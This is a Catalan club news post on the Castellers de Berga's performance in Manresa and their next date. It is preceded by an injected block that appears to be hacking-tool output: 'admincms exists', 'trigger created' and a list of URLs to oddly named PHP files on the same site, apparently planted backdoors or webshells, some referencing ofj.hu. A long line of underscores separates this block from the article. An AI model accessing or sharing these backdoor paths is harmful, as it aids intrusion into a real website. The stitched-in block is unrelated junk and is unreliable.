Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?cron https://castellersdeberga.cat/wp-admin/includes/class-wp-filesystem-ssh2-private-ajax-response-private-wp-meta-private-private-cron.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-bulk-upgrader-skin-wp.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-post-comments-list-table-ajax-response-ajax-response-meta.php https://castellersdeberga.cat/wp-content/plugins/revslider/uninstall-ajax-core-ajax-response-private-ajax-core-private-cron-wp-private-cron.php https://castellersdeberga.cat/wp-content/plugins/woocommerce/woocommerce-ajax-response-core-meta-ajax-response-core-core-private-cron-core.php https://castellersdeberga.cat/wp-includes/class-wp-image-editor-gd-meta.php https://castellersdeberga.cat/wp-includes/ID3/module.audio-video.matroska-ajax-response-ajax-core-wp-stream.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Dos castells de 7 més, a Manresa
 

Dos castells de 7 més, a Manresa


Dos castells de 7 més, a ManresaDiumenge 22 de maig, els Castellers de Berga vam tornar a actuar a Manresa. Fou a la Plaça Major, davant de l’ajuntament, una plaça poc habituda als castells i que feia 8 anys que els Tirallongues de Manresa no hi actuaven. La diada castellera va comptar amb els Castellers de la Sagrada Família, com a tercera colla.

Sota un sol imponent i una calor més pròpia de mig juliol que del mes de maig, els Castellers de Berga vam repetir l’actuació de Berga de l’1 de maig descarregant el 3 de 7, el 4 de 7 i el 4 de 6 amb agulla. Els Tirallongues de Manresa també van descarregar el 3 i el 4 de 7 i els Castellers de la Sagrada Família van descarregar castells de 6 pisos.

La propera actuació dels Castellers de Berga serà la Diada dels Quatre Fuets, a la prèvia de Patum. Serà el diumenge 12 de juny, a al Plaça de Sant Pere, a Berga, i també hi seran els Minyons de Terrassa i els Capgrossos de Mataró.